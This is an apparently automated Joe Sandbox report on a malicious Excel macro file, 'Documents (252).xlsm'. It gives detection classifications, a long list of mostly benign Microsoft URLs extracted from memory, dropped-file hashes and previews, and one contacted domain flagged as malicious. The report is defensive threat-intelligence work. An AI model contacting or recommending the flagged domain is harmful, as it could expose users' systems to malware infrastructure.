Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings
Impact: Modify System Partition, Device Lockout, Delete Device Data

Behavior Graph


Screenshots

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label | Link
xherzog24pv.xyz | 1% | Virustotal | | Browse

URLs

Source | Detection | Scanner | Label | Link
https://cdn.entity. | 0% | URL Reputation | safe |
https://powerlift.acompli.net | 0% | URL Reputation | safe |
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe |
https://cortana.ai | 0% | URL Reputation | safe |
https://api.aadrm.com/ | 0% | URL Reputation | safe |
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Virustotal | | Browse
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Avira URL Cloud | safe |
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe |
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe |
https://officeci.azurewebsites.net/api/ | 0% | Virustotal | | Browse
https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe |
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe |
https://store.officeppe.com/addinstemplate | 0% | URL Reputation | safe |
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe |
https://www.odwebp.svc.ms | 0% | URL Reputation | safe |
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe |
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe |
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe |
https://ncus.contentsync. | 0% | URL Reputation | safe |
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe |
https://wus2.contentsync. | 0% | URL Reputation | safe |
https://asgsmsproxyapi.azurewebsites.net/ | 0% | Virustotal | | Browse
https://asgsmsproxyapi.azurewebsites.net/ | 0% | Avira URL Cloud | safe |
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe |
https://ncus.pagecontentsync. | 0% | URL Reputation | safe |
https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe |
https://dataservice.o365filtering.com | 0% | URL Reputation | safe |
https://api.cortana.ai | 0% | URL Reputation | safe |
https://ovisualuiapp.azurewebsites.net/pbiagave/ | 0% | Avira URL Cloud | safe |
https://directory.services. | 0% | URL Reputation | safe |
https://staging.cortana.ai | 0% | URL Reputation | safe |

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
xherzog24pv.xyz | unknown | unknown | true | | unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
    high
    https://login.microsoftonline.com/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
      high
      https://shell.suite.office.com:144357FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
          high
          https://autodiscover-s.outlook.com/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
              high
              https://cdn.entity.57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                    high
                    https://powerlift.acompli.net57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v157FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                      high
                      https://cortana.ai57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                high
                                https://api.aadrm.com/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                      high
                                      https://cr.office.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/Office57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                            high
                                            https://graph.ppe.windows.net57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                            high
                                                            https://graph.windows.net57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                  high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://ncus.contentsync. | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Detection: URL Reputation: safe; URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | Reputation: unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
http://weather.service.msn.com/data.aspx | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://apis.live.net/v5.0/ | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Detection: URL Reputation: safe; URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | Reputation: unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://management.azure.com | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://wus2.contentsync. | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Detection: URL Reputation: safe; URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | Reputation: unknown
https://incidents.diagnostics.office.com | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://clients.config.office.net/user/v1.0/ios | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://insertmedia.bing.office.net/odc/insertmedia | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://o365auditrealtimeingestion.manage.office.com | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://outlook.office365.com/api/v1.0/me/Activities | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://api.office.net | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://incidents.diagnosticssdf.office.com | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://asgsmsproxyapi.azurewebsites.net/ | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Detection: 0%, Virustotal; Avira URL Cloud: safe | Reputation: unknown
https://clients.config.office.net/user/v1.0/android/policies | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://entitlement.diagnostics.office.com | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://outlook.office.com/ | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://storage.live.com/clientlogs/uploadlocation | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://templatelogging.office.com/client/log | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://outlook.office365.com/ | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://webshell.suite.office.com | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://management.azure.com/ | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://login.windows.net/common/oauth2/authorize | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Detection: URL Reputation: safe; URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | Reputation: unknown
https://graph.windows.net/ | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://api.powerbi.com/beta/myorg/imports | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://devnull.onenote.com | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://ncus.pagecontentsync. | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Detection: URL Reputation: safe; URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | Reputation: unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://messaging.office.com/ | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://augloop.office.com/v2 | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://skyapi.live.net/Activity/ | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Detection: URL Reputation: safe; URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | Reputation: unknown
https://clients.config.office.net/user/v1.0/mac | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://dataservice.o365filtering.com | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Detection: URL Reputation: safe; URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | Reputation: unknown
https://api.cortana.ai | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Detection: URL Reputation: safe; URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | Reputation: unknown
https://onedrive.live.com | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://ovisualuiapp.azurewebsites.net/pbiagave/ | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Detection: Avira URL Cloud: safe | Reputation: unknown
https://visio.uservoice.com/forums/368202-visio-on-devices | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://directory.services. | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Detection: URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | Reputation: unknown
https://login.windows-ppe.net/common/oauth2/authorize | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Reputation: high
https://staging.cortana.ai | Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.dr | Malicious: false | Detection: URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | Reputation: unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 382991
Start date: 07.04.2021
Start time: 02:14:15
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 31s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Documents (252).xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal96.troj.expl.evad.winXLSM@5/14@1/0
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.43.193.48, 52.109.76.68, 52.109.76.33, 52.147.198.201, 52.109.76.35, 13.88.21.125, 104.43.139.144, 20.50.102.62, 23.10.249.43, 23.10.249.26, 23.54.113.104, 20.54.26.129, 23.54.113.53
• Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net

Simulations

Behavior and APIs

Time | Type | Description
02:15:10 | API Interceptor | 1x Sleep call for process: WMIC.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\57FBA9A8-2000-47F8-A377-79E0C5F32956
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 133170
Entropy (8bit): 5.371008837049652
Encrypted: false
                                                                                                                                                  SSDEEP:1536:ZcQIeNquBXA3gBwqpQ9DQW+zAM34ZldpKWXboOilXNErLdME9:5VQ9DQW+zTXiJ
                                                                                                                                                  MD5:5DB1A55B07BB8D56FD0EB788248F4D96
                                                                                                                                                  SHA1:C2FA81884E6C84D3BDE2D6EC30C034621AD62280
                                                                                                                                                  SHA-256:14D3E8A56B4E76CACE007D18A6BC9159F6385915D7052A14181AD400D7BF95ED
                                                                                                                                                  SHA-512:C408789701671C045A72AA3D3C44B7D13A75F5AA3D1F446F21909CEAD76F6F9C19DCAD47D2FCF2D76ADCFE9E8465009C30CC03F7EBAC214AD43068941B0573B4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-04-07T00:15:07">.. Build: 16.0.13925.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16FAB1FD.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1028
                                                                                                                                                  Entropy (8bit):7.761039651897249
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA
                                                                                                                                                  MD5:600F503BC1066BEB5FB5DD494AA1CD74
                                                                                                                                                  SHA1:A504D5E687B98F9E0FD2896DFC8492DE0F974BE6
                                                                                                                                                  SHA-256:B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3
                                                                                                                                                  SHA-512:B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x....IDATHK..YL.Q......Vl.P. .qC.(....(.".-..q....%1.q./F.Q.L\./4.KlX.Q...EE..(. ..V.i;.z...h..7.0........(...|s.k.J.Mm].J|.3........W.&EE..s.hS.}.....%^x`s....s..Rb..9....jw...o.e..17=:!&..X.Q._.!. |....N$.L.1.N..}.k..v..2.piZ..A.,.l.w......I.{...p...C[......'.........b....:f.\?!3MK........Cb..B.....%`?1..Y>9\....P.......z..uK...g.V.P.U.3...L.j.?(.g.....}.=.}......L.B.{...i.!..-q....9(=%^......&.q.j..>.q...w.NO.@.D..jmnL...U.R0B=6...U....P}Koh.D@"...]9...r,. .."2.......[.~ .......... .ay....nCm'...(..$......_4....*gNT..02h...zT.b.hhF..E.l.Z..J8.....=..H.{....Q...hg.g...u_!...T7./..+...u.....m...C]..E-..ki.CS..2.V..v>.?..$d..U.o.o...w........."....7..g...O]...U`..........g..A.j.....b...\.s(I.......@._B....i..2.I..7W.6....`..!r].P.......^.8n ..X...+3...F.....!x...H..fkYu....y.l...(../.y....,;~qV.R!#C.q...yoE..{O:...R.......c...Z;..[.x.....#N...'....M..@...n0..nD..!..p.!J....
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\24A76642.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):677
                                                                                                                                                  Entropy (8bit):7.433026174405032
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6
                                                                                                                                                  MD5:55E8A29B221E51BE421B7D4F5F5F7E52
                                                                                                                                                  SHA1:117E73181FC9CDAA0904C6372D68EE48CEDC14E4
                                                                                                                                                  SHA-256:B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8
                                                                                                                                                  SHA-512:8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x...JIDATHKc...?...g..l.;k...FF...@H..jb`d..?-P'.SYA......f.........'.?............{K.a..:..W..s.~.....{.....<.....9.......[.=\{.._FN^._{'{3VM?.p..v._....v..;..s...O.....*.|........yaz....!/...........o..xZ.Sn...O+YP.122.....33.A..3.?.DR...+.F...o.M_..h.W...}..K?.........*....z..K...........F?..{............|..`!l*X...E.....$.......3... ..0....+.r.D.D7e.&.b...t...../..o.I2.p...yl.J|.Y0j4Z....!.s#;.XW.gbd`.bb........X..ue...'fi..[1..!.@.......s.:(..e`}.. ...-...1.. J..(`..,}.X...H.>".m?..h .X.D.5Ff......y"4.P.4d...@.A..8.[?..7q....I.*.M..[.>\{....j..Y3...3.5'......op.....IEND.B`.
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\6F5AD7DA.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 287 x 78, 8-bit/color RGBA, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):15644
                                                                                                                                                  Entropy (8bit):7.974497191204788
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:EZRPEsXoz+jRHBbn1+3rhK0XwN8KHpy/c2C9NZ9ff:EZ6sYijj43VK0XwmKJ39Nnf
                                                                                                                                                  MD5:29A9EE6FB5591751FC60ECD0FDB9478D
                                                                                                                                                  SHA1:D8A58D27A5D77416E1B882FDE001FE827EB0C1F5
                                                                                                                                                  SHA-256:F2E6BD48ACC89A7DF730F5FE7FD0A19112FEF2C59BFEDF607996B1062337FC8F
                                                                                                                                                  SHA-512:5465ABC4330E88D0490B5F61532B990859600F920D4ACA8F4A9013344B478EF51823D37E850ECF67829EEDFB80C00B6324EFE97DD175E56985C1AC07ED890AFE
                                                                                                                                                  Malicious:false
